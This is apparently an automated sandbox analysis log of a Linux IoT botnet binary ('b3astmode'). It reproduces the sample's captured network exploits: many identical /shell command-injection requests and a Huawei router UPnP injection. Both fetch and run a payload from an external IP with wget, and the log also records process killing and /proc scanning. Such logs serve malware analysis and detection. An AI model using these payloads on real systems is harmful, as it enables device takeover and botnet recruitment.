              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: b3astmode.sh4.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: b3astmode.sh4.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39256
              Source: unknownNetwork traffic detected: HTTP traffic on port 39256 -> 443
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)SIGKILL sent: pid: 936, result: successfulJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)SIGKILL sent: pid: 6263, result: successfulJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)SIGKILL sent: pid: 936, result: successfulJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)SIGKILL sent: pid: 759, result: successfulJump to behavior
              Source: classification engineClassification label: mal88.troj.linELF@0/0@0/0
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/491/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/793/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/772/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/796/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/774/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/797/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/777/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/799/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/658/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/912/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/759/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/936/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/918/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/1/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/761/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/785/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/884/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/720/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/721/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/788/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/789/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/800/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/801/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/847/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)File opened: /proc/904/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2033/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2033/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1582/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1582/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2275/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1612/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1612/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1579/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1579/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1699/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1699/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1335/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1335/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1698/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1698/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2028/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2028/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1334/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1334/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1576/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/1576/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2302/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/3236/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2025/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2025/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/2146/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/910/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/912/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/912/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/912/exeJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/759/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/759/fdJump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)File opened: /proc/759/exeJump to behavior
